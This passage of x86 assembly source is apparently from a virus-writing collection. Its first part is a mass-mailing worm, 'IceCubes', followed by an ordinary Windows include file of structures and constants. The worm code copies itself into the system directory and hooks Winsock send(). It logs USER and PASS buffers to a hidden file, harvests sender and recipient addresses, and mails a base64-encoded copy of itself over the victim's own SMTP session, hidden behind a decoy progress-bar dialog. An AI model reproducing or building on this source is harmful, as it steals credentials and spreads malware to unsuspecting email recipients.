xor eax, eax
mov ax, word ptr [ebp + writtensize]
push eax
push esi
push dword ptr [ebp + filehandle]
lea eax, [ebp + AWriteFile]
call GETAPI
ret
CloseInstallIni:
lea esi, [ebp + inicrlf] ; write original dll
xor ecx, ecx
call StringSize
call Write
CREATE_INI_FILE endp
COPY_HOST_FILE proc
GetCurrentHostPath:
push 100h
lea eax, [ebp + currentdir]
push eax
push 00h
lea eax, [ebp + AGetModuleFileName]
call GETAPI
SetSysDirectory:
call SET_SYSDIR
CopyWormHostFile:
push 00h
lea eax, [ebp + wsock2]
push eax
lea eax, [ebp + currentdir]
push eax
lea eax, [ebp + ACopyFile]
call GETAPI
ret
COPY_HOST_FILE endp
INTERCEPT_WSOCK proc
InterceptWsockApiCall:
push ebp
call GetDelta
GetDelta:
pop ebp
sub ebp, offset GetDelta
pushad
CheckStatus:
mov eax, [esp+(8*4)+(1*4)+4 + 0] ; get send() socket
mov [ebp + socketh], eax ; save it
mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer
mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer
pushad
call GET_GETPROCADDRESS_API_ADDRESS
popad
CheckForSecurityInfo:
cmp [esi], 'RESU'
je StoreBufferData
cmp [esi], 'SSAP'
jne DontStore
StoreBufferData:
pushad
call WRITE_TO_FILE
popad
DontStore:
cmp [ebp + status], 00h ; monitoring==true ?
je CheckMailFrom ; yes, we are
cmp [ebp + status], 02h
je CheckRcptTo
cmp [ebp + status], 03h
je CheckMimeFrom
cmp [ebp + status], 05h
je CheckQuit
jmp Continue
CheckMailFrom:
mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer
mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer
cmp [esi], 'LIAM'
jne Continue
StoreMailFromTag:
pushad
call WRITE_TO_FILE
popad
SaveMailFrom:
mov [ebp + fromsize], ecx
push ecx
push esi
push ecx
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz ErrorWhileSending
pop esi
pop ecx
mov [ebp + fromaddress], eax
mov edi, eax
rep movsb
mov [ebp + status], 02h
CheckRcptTo:
mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer
mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer
cmp [esi], 'TPCR'
jne CheckData
AllocateRcptMemory:
cmp [ebp + rcptnumber], 00h
jne SaveRcptTo
push ecx
push esi
push 500h
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz ErrorWhileSending ; mem for rctp email
mov [ebp + rcpt_buffer_address], eax ; addresses
push 100h
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz ErrorWhileSending ; mem for size of rctp
mov [ebp + rcpt_size_address], eax ; email addresses
pop esi
pop ecx
SaveRcptTo:
push ecx ; store rcpt string
mov edi, [ebp + rcpt_buffer_address]
mov eax, [ebp + totalrcptsize]
add edi, eax
rep movsb
pop ecx
CheckData:
mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer
mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer
cmp [esi], 'ATAD'
jne Continue
mov [ebp + status], 03h
CheckMimeFrom:
mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer
mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer
MimeFromLoop:
lea edi, [ebp + fromtag]
push ecx
push esi
mov ecx, 05h
rep cmpsb
pop esi
pop ecx
je SearchMimeFromEnd
inc esi
loop MimeFromLoop
CheckMimeTo:
mov esi, [esp+(8*4)+(1*4)+4 + 4]
mov ecx, [esp+(8*4)+(1*4)+4 + 8]
MimeToLoop:
lea edi, [ebp + totag]
push ecx
push esi
mov ecx, 03h
rep cmpsb
pop esi
pop ecx
je SearchMimeToEnd
inc esi
loop MimeToLoop
jmp CheckQuit
SearchMimeFromEnd:
push esi
FromEndLoop:
lea edi, [ebp + mimeendtag]
push ecx
push esi
mov ecx, 01h
rep cmpsb
pop esi
pop ecx
je SaveMimeFrom
inc esi
loop FromEndLoop
pop esi
jmp Continue
SaveMimeFrom:
mov eax, esi
pop esi
sub eax, esi
mov ecx, eax
add ecx, 03h
mov [ebp + mimefromsize], ecx
push esi
push ecx
push ecx
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz MimeError
mov [ebp + mimefrom_address], eax
pop ecx
pop esi
mov edi, eax
rep movsb
SearchMimeToEnd:
push esi
ToEndLoop:
lea edi, [ebp + toendtag]
push ecx
push esi
mov ecx, 08h
rep cmpsb
pop esi
pop ecx
je SaveMimeTo
inc esi
loop ToEndLoop
pop esi
jmp Continue
SaveMimeTo:
mov eax, esi
pop esi
sub eax, esi
mov ecx, eax
mov [ebp + mimetosize], ecx
push esi
push ecx
push ecx
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz MimeError
mov [ebp + mimeto_address], eax
pop ecx
pop esi
mov edi, eax
rep movsb
MimeError:
pop ecx
pop esi
mov [ebp + status], 05h
CheckQuit:
mov esi, [esp+(8*4)+(1*4)+4 + 4]
mov ecx, [esp+(8*4)+(1*4)+4 + 8]
cmp [esi], 'TIUQ'
jne Continue
pushad
call SEND_MAIL
popad
jmp InterceptionFinished
ErrorWhileSending:
pop esi
pop ecx
InterceptionFinished:
mov [ebp + status], 00h
mov [ebp + totalrcptsize], 00h
mov [ebp + rcptnumber], 00h
mov [ebp + tostatus], 00h
mov [ebp + fromstatus], 00h
jmp Continue
Continue:
popad
lea eax, [ebp + InterceptWsockApiCall] ; get ep va
sub eax, dword ptr [ebp + wnewapiaddress] ; - ep RVA
add eax, dword ptr [ebp + woldapiaddress] ; = imagebase
pop ebp
jmp eax
INTERCEPT_WSOCK endp
PREPARE_ATTACHMENT proc
SetSysDir:
call SET_SYSDIR
OpenSourceFile:
push 0
push 0
push 3
push 0
push 0
push 80000000h
lea eax, [ebp + wsock2]
push eax
lea eax, [ebp + ACreateFile]
call GETAPI
mov [ebp + filehandle], eax ; save file handle
cmp eax, -1
je NoBase64Encode
GetSourceFileSize:
push 00h
push dword ptr [ebp + filehandle]
lea eax, [ebp + AGetFileSize]
call GETAPI
or eax, eax
jz NoBase64Encode
mov [ebp + filesize], eax ; get file size
AllocateSourceMemory:
add eax, 02h
push eax
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz NoBase64Encode ; not enough memory?
mov [ebp + smHnd], eax ; sourcememory handle
AllocateDestinationMemory:
mov eax, [ebp + filesize]
xor edx, edx
mov ecx, 02h
mul ecx
push eax
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz NoBase64Encode ; not enough memory?
mov [ebp + dmHnd], eax ; destinationmemory handle
ReadSourceFile:
mov [ebp + bytesread], 00h
push 00h
lea eax, [ebp + bytesread]
push eax
push [ebp + filesize]
push dword ptr [ebp + smHnd]
push dword ptr [ebp + filehandle]
lea eax, [ebp + AReadFile]
call GETAPI
CloseSourceFile:
push dword ptr [ebp + filehandle] ; close the file
lea eax, [ebp + ACloseHandle]
call GETAPI
EncodeSourceData:
mov eax, dword ptr [ebp + smHnd]
mov edx, dword ptr [ebp + dmHnd]
mov ecx, dword ptr [ebp + filesize]
call BASE64_ENCODER ; encode into Base64
mov [ebp + encodedsize], ecx
NoBase64Encode:
ret
PREPARE_ATTACHMENT endp
BASE64_ENCODER proc
AddTwoBytes:
cmp edx, 01h
jne AddOneByte
add ecx, 02h
jmp EncodeBase64
AddOneByte:
add ecx, 01h
EncodeBase64:
pop edx
pop eax
xor esi, esi
lea edi, [ebp + encTable]
push ebp
xor ebp, ebp
BaseLoop:
xor ebx, ebx
mov bl, byte ptr [eax]
shr bl, 2
and bl, 00111111b
mov bh, byte ptr [edi+ebx]
mov byte ptr [edx+esi], bh
inc esi
inc eax
mov bx,word ptr [eax]
xchg bl, bh
shr bx, 6
xor bh, bh
and bl, 00111111b
mov bh, byte ptr [edi+ebx]
mov byte ptr [edx+esi], bh
inc esi
inc eax
xor ebx, ebx
mov bl, byte ptr [eax]
and bl, 00111111b
mov bh, byte ptr [edi+ebx]
mov byte ptr [edx+esi], bh
inc esi
inc eax
inc ebp
cmp ebp, 24
ja AddEndOfLine
inc ebp
AddedEndOfLine:
sub ecx, 3
or ecx, ecx
jnz BaseLoop
AddEndOfLine:
xor ebp, ebp
mov word ptr [edx+esi], 0a0dh
add esi, 2
jmp AddedEndOfLine
BASE64_ENCODER endp
WRITE_TO_FILE proc
StoreBuffer:
push esi
push ecx
SetEmailDropDir:
call SET_WINDIR
CreateEmailDrop:
push 0 ; template handle=0
push 20h ; attributes=any file
push 04h ; type= existing file
push 0 ; security option = 0
push 1 ; shared for read
push 80000000h or 40000000h ; generic read write
lea eax, [ebp + passwordfile]
push eax ; offset file name
lea eax, [ebp + ACreateFile]
call GETAPI
mov [ebp + filehandle], eax ; save file handle
cmp eax, -1
je BufferError
SetDropPointer:
push 2
push 0
push 0
push dword ptr [ebp + filehandle] ; filehandle
lea eax, [ebp + ASetFilePointer]
call GETAPI
pop ecx
pop esi
WriteBuffer:
push 0h
lea eax, [ebp + writtenbytes]
push eax
push ecx ; push buffersize
push esi ; push offset buffer
push dword ptr [ebp + filehandle]
lea eax, [ebp + AWriteFile]
call GETAPI
CloseBufferFile:
push dword ptr [ebp + filehandle]
lea eax, [ebp + ACloseHandle]
call GETAPI
ret
BufferError:
pop ecx
pop esi
ret
WRITE_TO_FILE endp
SEND_MAIL proc
GetAllApiAddresses:
call GET_WSOCK32_BASE_ADDRESS
call GET_USER32_BASE_ADDRESS
call PREPARE_ATTACHMENT
AllocateEmailBufferMemory:
mov eax, [ebp + encodedsize]
mov ecx, 02h
mul ecx
push eax
push 00h
lea eax, [ebp + AGlobalAlloc]
call GETAPI
or eax, eax
jz SendError ; mem for email
mov [ebp + email_buffer_address], eax ; buffer
SendMailFromTag:
mov eax, dword ptr [ebp + fromaddress]
mov ecx, dword ptr [ebp + fromsize]
call SendCommand
call ReceiveReply
SendRcptToTags:
xor ecx, ecx
mov [ebp + totalrcptsize], 00h
RcptSendLoop:
push ecx
mov edi, [ebp + rcpt_size_address]
mov eax, ecx
mov edx, 04h
mul edx
add edi, eax
mov ecx, dword ptr [edi]
pushad
mov eax, esi
call SendCommand
call ReceiveReply
popad
pop ecx
inc ecx
mov eax, [ebp + rcptnumber]
cmp ecx, eax
jne RcptSendLoop
SendDataCommand:
lea eax, [ebp + datatag]
mov ecx, 06h
call SendCommand
call ReceiveReply
EmailBody_EmailId:
mov [ebp + email_size], 00h
mov edi, [ebp + email_buffer_address]
lea esi, [ebp + emailid]
mov ecx, 21d
add [ebp + email_size], ecx
rep movsb
EmailBody_EmailFrom:
cmp [ebp + fromstatus], 01h
jne EmailBody_MakeEmailFrom
EmailBody_MakeEmailFrom:
lea esi, [ebp + fromtag]
mov ecx, 05h
add [ebp + email_size], ecx
rep movsb
EmailBody_MakeEmailTo:
lea esi, [ebp + totag]
mov ecx, 03h
add [ebp + email_size], ecx
rep movsb
RcptStringLoop:
push ecx
push edi
mov edi, [ebp + rcpt_size_address]
mov eax, ecx
mov edx, 04h
mul edx
add edi, eax
mov ecx, dword ptr [edi]
pop edi
push ecx
mov esi, [ebp + rcpt_buffer_address]
mov eax, [ebp + totalrcptsize]
add esi, eax
add esi, 08h
sub ecx, 08h
add [ebp + email_size], ecx
rep movsb
pop ecx
add eax, ecx
mov [ebp + totalrcptsize], eax
pop ecx
inc ecx
mov eax, [ebp + rcptnumber]
cmp ecx, eax
jne RcptStringLoop
EmailBody_EmailStartPart:
lea esi, [ebp + emailstart]
mov ecx, emailend-emailstart
add [ebp + email_size], ecx
rep movsb
EmailBody_EmailAttachement:
mov esi, dword ptr [ebp + dmHnd]
mov ecx, [ebp + encodedsize]
add [ebp + email_size], ecx
rep movsb
EmailBody_EmailEndPart:
lea esi, [ebp + emailtail]
mov ecx, 17d
add [ebp + email_size], ecx
rep movsb
EmailBody_EndTag:
lea esi, [ebp + endtag]
mov ecx, 05h
add [ebp + email_size], ecx
rep movsb
SendEmailBody:
mov eax, [ebp + email_buffer_address]
mov ecx, [ebp + email_size]
call SendCommand
call ReceiveReply
MessageBoxDay:
lea eax, [ebp + timedate]
push eax
lea eax, [ebp + AGetSystemTime]
call GETAPI
MessageBoxPayload:
mov eax, 0040h
push eax
lea eax, [ebp + windowtitle]
push eax
lea eax, [ebp + msgmessage]
push eax
push 00h
lea eax, [ebp + AMessageBox]
call GETUAPI
SendError:
ret
SendCommand:
push eax
push 0h
push ecx
push eax
push dword ptr [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
cmp eax, -1
jne SendWentOk
pop eax
jmp SendCommand
SendWentOk:
pop eax
ret
ReceiveReply:
push LARGE 0
push LARGE 60
lea eax, [ebp + recvbuffer]
push eax
push dword ptr [ebp + socketh]
lea eax, [ebp + ARecv]
call GETWAPI ; call the api
cmp eax, -1
je ReceiveReply
ret
SEND_MAIL endp
;****************************************************************************;
Leap:
.code
OriginalHost:
push 0
call GetModuleHandleA
mov hInst, eax
CreateProgressWindow:
push 00h
push offset MYDIALOG_0
push 00h
push 102
push hInst
call DialogBoxParamA
CreateMainWindow:
push 00h
push offset MYDIALOG_1
push 00h
push 103
push hInst
call DialogBoxParamA
Leave:
push 0
call ExitProcess
CheckParameter:
cmp [umsg], WM_INITDIALOG
je CenterDlg
cmp [umsg], WM_DESTROY
je Exit
cmp [umsg], WM_CLOSE
je Exit
cmp flag, 01h
je CreateProgressThread
cmp flag, 02h
je Exit
xor eax, eax
ret
CenterDlg:
push offset dlgrect
push handle
call GetWindowRect
call GetDesktopWindow
push offset desktoprect
push eax
call GetWindowRect
push 00h
mov eax, dlgrect.rcBottom
sub eax, dlgrect.rcTop
mov dlgheight, eax
push eax ; height
mov eax, dlgrect.rcRight
sub eax, dlgrect.rcLeft
mov dlgwidth, eax ; width
push eax
mov eax, desktoprect.rcBottom
sub eax, dlgheight
shr eax, 1
push eax ; bottom
mov eax, desktoprect.rcRight
sub eax, dlgwidth
shr eax, 1
push eax ; top
push handle ; handle
call MoveWindow ; move to center
mov flag, 01h
xor eax, eax
ret
CreateProgressThread:
push offset threadid
push 00h
push handle
push offset PROGRESS
push 00h
push 00h
call CreateThread
mov flag, 00h
xor eax, eax
ret
Exit:
push wparam
push handle
call EndDialog
mov eax, 01h
ret
MYDIALOG_0 endp
CheckParameter1:
cmp [umsg], WM_INITDIALOG
je CenterDlg1
cmp [umsg], WM_DESTROY
je Exit1
cmp [umsg], WM_CLOSE
je Exit1
cmp [umsg], WM_COMMAND
je CheckCommand
cmp [umsg], WM_VSCROLL
je SpinButtonClick
cmp initflag, 01h
je InitValues
xor eax, eax
ret
CheckCommand:
cmp [wparam], 1009
je Exit
cmp [wparam], 1014
je SetOkFlag
xor eax, eax
ret
SpinButtonClick:
xor eax, eax
mov ecx, [wparam]
rol ecx, 16
mov ax, cx
PressedDown:
mov pastvalue, eax
cmp doneflag, 00h
jne Reset
cmp currentvalue, '0'
je DontDecrease
dec byte ptr currentvalue
DontDecrease:
push offset currentvalue
push 00h
push WM_SETTEXT
push 1003
push handle
call SendDlgItemMessageA
mov doneflag, 01h
xor eax, eax
ret
PressedUp:
mov pastvalue, eax
cmp currentvalue, '9'
je Reset
cmp doneflag, 00h
jne Reset
inc byte ptr currentvalue
push offset currentvalue
push 00h
push WM_SETTEXT
push 1003
push handle
call SendDlgItemMessageA
mov doneflag, 01h
xor eax, eax
ret
Reset:
mov doneflag, 00h
xor eax, eax
ret
SetOkFlag:
mov okflag, 01h
jmp Exit
CenterDlg1:
push offset dlgrect
push handle
call GetWindowRect
call GetDesktopWindow
push offset desktoprect
push eax
call GetWindowRect
push 00h
mov eax, dlgrect.rcBottom
sub eax, dlgrect.rcTop
mov dlgheight, eax
push eax ; height
mov eax, dlgrect.rcRight
sub eax, dlgrect.rcLeft
mov dlgwidth, eax ; width
push eax
mov eax, desktoprect.rcBottom
sub eax, dlgheight
shr eax, 1
push eax ; bottom
mov eax, desktoprect.rcRight
sub eax, dlgwidth
shr eax, 1
push eax ; top
push handle ; handle
call MoveWindow ; move to center
mov initflag, 01h
xor eax, eax
ret
InitValues:
mov initflag, 00h
call SendDlgItemMessageA, handle, 1004, CB_RESETCONTENT, 00h,00h
call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value11
call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value12
call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value13
call SendDlgItemMessageA, handle, 1004, 143h, 00h, offset value14
call SendDlgItemMessageA, handle, 1004, CB_SETCURSEL, 00h, 01h
call SendDlgItemMessageA, handle, 1003, WM_SETTEXT, 00h, offset currentvalue
call SendDlgItemMessageA, handle, 1005, WM_SETTEXT, 00h, offset value3
call SendDlgItemMessageA, handle, 1008, WM_SETTEXT, 00h, offset value4
call SendDlgItemMessageA, handle, 1000, 00F5h, 00h,00h
call SendDlgItemMessageA, handle, 1001, 00F5h, 00h,00h
call SendDlgItemMessageA, handle, 1006, 00F5h, 00h,00h
call SendDlgItemMessageA, handle, 1010, 00F5h, 00h,00h
call SendDlgItemMessageA, handle, 1013, 00F5h, 00h,00h
xor eax, eax
ret
Exit1:
push wparam
push handle
call EndDialog
mov eax, 01h
ret
MYDIALOG_1 endp
ClearProgressBar:
push 00h
push 00h
push PBM_SETPOS
push 105
push handle
call SendDlgItemMessageA
xor eax, eax
xor ecx, ecx
LittleLoop:
inc ecx
cmp ecx, 100000h
jne LittleLoop
ProgressLoop:
inc eax
push 00h
push eax
push PBM_SETPOS
push 105
push handle
call SendDlgItemMessageA
xor ecx, ecx
cmp eax, 99d
jne LittleLoop
ProgressDone:
mov flag, 02h
push threadid
call CloseHandle
ret
PROGRESS endp
;============================================================================;
end Start
end
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ICECUBES.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MYINC.INC]ÄÄÄ
LPVOID typedef DWORD ;long ptr to buffer
BOOL typedef DWORD ;boolean variable
HANDLE typedef DWORD ;unspecified handle
LPSTR typedef DWORD ;long ptr to string
LPBYTE typedef DWORD ;long ptr to byte
ACHAR typedef BYTE ;ansi character
CHAR textequ <ACHAR> ;ansi char type
CHAR_ equ 1 ;ansi char size
CREATE_DEFAULT_ERROR_MODE equ 04000000h
PROCESS_INFORMATION struct
pi_hProcess HANDLE 0 ;process handle
pi_hThread HANDLE 0 ;thread handle
pi_dwProcessId DWORD 0 ;process id
pi_dwThreadId DWORD 0 ;thread id
PROCESS_INFORMATION ends
PROCESS_INFORMATION_ equ 4+4+4+4
STARTUPINFO struct
si_cb DWORD 0 ;structure size
si_lpReserved LPSTR 0 ;(reserved)
si_lpDesktop LPSTR 0 ;desktop name
sl_lpTitle LPSTR 0 ;console window title
si_dwX DWORD 0 ;window origin (column)
si_dwY DWORD 0 ;window origin (row)
si_dwXSize DWORD 0 ;window width
si_dwYSize DWORD 0 ;window height
si_dwXCountChars DWORD 0 ;screen buffer width
si_dwYCountChars DWORD 0 ;screen buffer height
si_dwFillAttribute DWORD 0 ;console window initialization
si_dwFlags DWORD 0 ;structure member flags
si_wShowWindow WORD 0 ;ShowWindow() parameter
si_cbReserved2 WORD 0 ;(reserved)
si_lpReserved2 LPBYTE 0 ;(reserved)
si_hStdInput HANDLE 0 ;standard input handle
si_hStdOutput HANDLE 0 ;standard output handle
si_hStdError HANDLE 0 ;standard error handle
STARTUPINFO ends
STARTUPINFO_ equ 4+4+4+4+4+4+4+4+4+4+4+4+2+2+4+4+4+4
SYSTEMTIME struct
wYear WORD 0 ;current year
wMonth WORD 0 ;current month (1..12)
wDayOfWeek WORD 0 ;day of week (0 = sunday)
wDay WORD 0 ;current day of the month
wHour WORD 0 ;current hour
wMinute WORD 0 ;current minute
wSecond WORD 0 ;current second
wMilliseconds WORD 0 ;current millisecond
SYSTEMTIME ends
SYSTEMTIME_ equ 2+2+2+2+2+2+2+2
;
;*******************************************************************
;
; Misc EQU's
;
;*******************************************************************
GCL_MENUNAME equ -8
GCL_HBRBACKGROUND equ -10
GCL_HCURSOR equ -12
GCL_HICON equ -14
GCL_HMODULE equ -16
GCL_CBWNDEXTRA equ -18
GCL_CBCLSEXTRA equ -20
GCL_WNDPROC equ -24
GCL_STYLE equ -26
ICON_SMALL equ 0
DEFAULT_PITCH equ 0
DEFAULT_QUALITY equ 0
OEM_CHARSET equ 255
CLIP_CHARACTER_PRECIS equ 1
CLIP_DEFAULT_PRECIS equ 0
OUT_DEFAULT_PRECIS equ 0
;*******************************************************************
;
; Window Class
;
;*******************************************************************
DLGWINDOWEXTRA equ 30
WNDCLASSEX STRUCT
wc_cbSize DWORD ?
wc_style DWORD ?
wc_lpfnWndProc DWORD ?
wc_cbClsExtra DWORD ?
wc_cbWndExtra DWORD ?
wc_hInstance DWORD ?
wc_hIcon DWORD ?
wc_hCursor DWORD ?
wc_hbrBackground DWORD ?
wc_lpszMenuName DWORD ?
wc_lpszClassName DWORD ?
wc_hIconSm DWORD ?
WNDCLASSEX ENDS
;*******************************************************************
;
; Message Structure
;
;*******************************************************************
MSG STRUCT
msg_hwnd DWORD ?
msg_message DWORD ?
msg_wParam DWORD ?
msg_lParam DWORD ?
msg_time DWORD ?
msg_pt QWORD ?
MSG ENDS
;*******************************************************************
;
; Open Filename Dialog
;
;*******************************************************************
OPENFILENAME STRUCT
of_lStructSize DWORD ?
of_hWndOwner DWORD ?
of_hInstance DWORD ?
of_lpstrFilter DWORD ?
of_lpstrCustomFilter DWORD ?
of_nMaxCustFilter DWORD ?
of_nFilterIndex DWORD ?
of_lpstrFile DWORD ?
of_nMaxFile DWORD ?
of_lpstrFileTitle DWORD ?
of_nMaxFileTitle DWORD ?
of_lpstrInitialDir DWORD ?
of_lpstrTitle DWORD ?
of_Flags DWORD ?
of_nFileOffset WORD ?
of_nFileExtension WORD ?
of_lpstrDefExt DWORD ?
of_lCustData DWORD ?
of_lpfnHook DWORD ?
of_lpTemplateName DWORD ?
OPENFILENAME ENDS
;*******************************************************************
;
; List View Control
;
;*******************************************************************
LV_ITEM STRUC
lvi_imask DWORD ?
lvi_iItem DWORD ?
lvi_iSubItem DWORD ?
lvi_state DWORD ?
lvi_stateMask DWORD ?
lvi_pszText DWORD ?
lvi_cchTextMax DWORD ?
lvi_iImage DWORD ?
lvi_lParam DWORD ?
lvi_iIndent DWORD ?
LV_ITEM ENDS
LV_FINDINFO STRUC
lvfi_flags DWORD ?
lvfi_psz DWORD ?
lvfi_lParam DWORD ?
lvfi_pt QWORD ?
lvfi_vkDirection DWORD ?
LV_FINDINFO ENDS
LV_HITTESTINFO STRUC
lvht_pt QWORD ?
lvht_flags DWORD ?
lvht_iItem DWORD ?
LV_HITTESTINFO ENDS
LV_COLUMN STRUC
lvc_imask DWORD ?
lvc_fmt DWORD ?
lvc_lx DWORD ?
lvc_pszText DWORD ?
lvc_cchTextMax DWORD ?
lvc_iSubItem DWORD ?
LV_COLUMN ENDS
;*******************************************************************
;
; Rectangle
;
;*******************************************************************
RECT struc
rcLeft dd ?
rcTop dd ?
rcRight dd ?
rcBottom dd ?
RECT ends
;*******************************************************************
;
; Window Class structure
;
;*******************************************************************
WNDCLASS struc
clsStyle dw ? ; class style
clsLpfnWndProc dd ?
clsCbClsExtra dw ?
clsCbWndExtra dw ?
clsHInstance dw ? ; instance handle
clsHIcon dw ? ; class icon handle
clsHCursor dw ? ; class cursor handle
clsHbrBackground dw ? ; class background brush
clsLpszMenuName dd ? ; menu name
clsLpszClassName dd ? ; far ptr to class name
WNDCLASS ends
IFNDEF NOTEXT
TEXTMETRIC struc
tmHeight dw ?
tmAscent dw ?
tmDescent dw ?
tmIntLeading dw ?
tmExtLeading dw ?
tmAveCharWidth dw ?
tmMaxCharWidth dw ?
tmWeight dw ?
tmItalic db ?
tmUnderlined db ?
tmStruckOut db ?
tmFirstChar db ?
tmLastChar db ?
tmDefaultChar db ?
tmBreakChar db ?
tmPitch db ?
tmCharSet db ?
tmOverhang dw ?
tmAspectX dw ?
tmAspectY dw ?
TEXTMETRIC ends
LF_FACESIZE EQU 32
LOGFONT struc
lfHeight dw ?
lfWidth dw ?
lfEscapement dw ?
lfOrientation dw ?
lfWeight dw ?
lfItalic db ?
lfUnderline db ?
lfStrikeOut db ?
lfCharSet db ?
lfOutPrecision db ?
lfClipPrecision db ?
lfQuality db ?
lfPitchAndFamily db ?
lfFaceName db LF_FACESIZE dup(?)
LOGFONT ends
LOGBRUSH struc
lbStyle dw ?
lbColor dd ?
lbHatch dw ?
LOGBRUSH ends
;
; Text Drawing modes
;
TRANSPARENT = 1
OPAQUE = 2
;
; Mapping Modes
;
MM_TEXT = 1
MM_LOMETRIC = 2
MM_HIMETRIC = 3
MM_LOENGLISH = 4
MM_HIENGLISH = 5
MM_TWIPS = 6
MM_ISOTROPIC = 7
MM_ANISOTROPIC = 8
;
; Coordinate Modes
;
ABSOLUTE = 1
RELATIVE = 2
;
; Stock Logical Objects
;
WHITE_BRUSH = 0
LTGRAY_BRUSH = 1
GRAY_BRUSH = 2
DKGRAY_BRUSH = 3
BLACK_BRUSH = 4
NULL_BRUSH = 5
HOLLOW_BRUSH = 5
WHITE_PEN = 6
BLACK_PEN = 7
NULL_PEN = 8
DOT_MARKER = 9
OEM_FIXED_FONT = 10
ANSI_FIXED_FONT = 11
ANSI_VAR_FONT = 12
SYSTEM_FONT = 13
DEVICE_DEFAULT_FONT = 14
DEFAULT_PALETTE = 15
SYSTEM_FIXED_FONT = 16
ENDIF
;
; Brush Styles
;
BS_SOLID = 0
BS_NULL = 1
BS_HOLLOW = BS_NULL
BS_HATCHED = 2
BS_PATTERN = 3
BS_INDEXED = 4
BS_DIBPATTERN = 5
;
; Hatch Styles
;
HS_HORIZONTAL = 0 ; -----
HS_VERTICAL = 1 ; |||||
HS_FDIAGONAL = 2 ; \\\\\
HS_BDIAGONAL = 3 ; /////
HS_CROSS = 4 ; +++++
HS_DIAGCROSS = 5 ; xxxxx
;
; Pen Styles
;
PS_SOLID = 0
PS_DASH = 1 ; -------
PS_DOT = 2 ; .......
PS_DASHDOT = 3 ; _._._._
PS_DASHDOTDOT = 4 ; _.._.._
PS_NULL = 5
PS_INSIDEFRAME = 6
;
; Device Parameters for GetDeviceCaps()
;
DRIVERVERSION =0 ; Device driver version
TECHNOLOGY =2 ; Device classification
HORZSIZE =4 ; Horizontal size in millimeters
VERTSIZE =6 ; Vertical size in millimeters
HORZRES =8 ; Horizontal width in pixels
VERTRES =10 ; Vertical width in pixels
BITSPIXEL =12 ; Number of bits per pixel
PLANES =14 ; Number of planes
NUMBRUSHES =16 ; Number of brushes the device has
NUMPENS =18 ; Number of pens the device has
NUMMARKERS =20 ; Number of markers the device has
NUMFONTS =22 ; Number of fonts the device has
NUMCOLORS =24 ; Number of colors the device supports
PDEVICESIZE =26 ; Size required for device descriptor
CURVECAPS =28 ; Curve capabilities
LINECAPS =30 ; Line capabilities
POLYGONALCAPS =32 ; Polygonal capabilities
TEXTCAPS =34 ; Text capabilities
CLIPCAPS =36 ; Clipping capabilities
RASTERCAPS =38 ; Bitblt capabilities
ASPECTX =40 ; Length of the X leg
ASPECTY =42 ; Length of the Y leg
ASPECTXY =44 ; Length of the hypotenuse
endif ;NOGDICAPMASKS
IDI_APPLICATION = 32512
IDI_HAND = 32513
IDI_QUESTION = 32514
IDI_EXCLAMATION = 32515
IDI_ASTERISK = 32516
;
; OEM Resource Ordinal Numbers */
;
OBM_CLOSE = 32754
OBM_UPARROW = 32753
OBM_DNARROW = 32752
OBM_RGARROW = 32751
OBM_LFARROW = 32750
OBM_REDUCE = 32749
OBM_ZOOM = 32748
OBM_RESTORE = 32747
OBM_REDUCED = 32746
OBM_ZOOMD = 32745
OBM_RESTORED = 32744
OBM_UPARROWD = 32743
OBM_DNARROWD = 32742
OBM_RGARROWD = 32741
OBM_LFARROWD = 32740
OBM_MNARROW = 32739
OBM_COMBO = 32738
OBM_UPARROWI = 32737
OBM_DNARROWI = 32736
OBM_RGARROWI = 32735
OBM_LFARROWI = 32734
OBM_OLD_CLOSE = 32767
OBM_SIZE = 32766
OBM_OLD_UPARROW = 32765
OBM_OLD_DNARROW = 32764
OBM_OLD_RGARROW = 32763
OBM_OLD_LFARROW = 32762
OBM_BTSIZE = 32761
OBM_CHECK = 32760
OBM_CHECKBOXES = 32759
OBM_BTNCORNERS = 32758
OBM_OLD_REDUCE = 32757
OBM_OLD_ZOOM = 32756
OBM_OLD_RESTORE = 32755
OCR_NORMAL = 32512
OCR_IBEAM = 32513
OCR_WAIT = 32514
OCR_CROSS = 32515
OCR_UP = 32516
OCR_SIZE = 32640
OCR_ICON = 32641
OCR_SIZENWSE = 32642
OCR_SIZENESW = 32643
OCR_SIZEWE = 32644
OCR_SIZENS = 32645
OCR_SIZEALL = 32646
OCR_ICOCUR = 32647
OIC_SAMPLE = 32512
OIC_HAND = 32513
OIC_QUES = 32514
OIC_BANG = 32515
OIC_NOTE = 32516
;
; Scroll bar constants
;
SB_HORZ = 0
SB_VERT = 1
SB_CTL = 2
SB_BOTH = 3
;
; Scroll Commands
;
SB_LINEUP = 0
SB_LINEDOWN = 1
SB_PAGEUP = 2
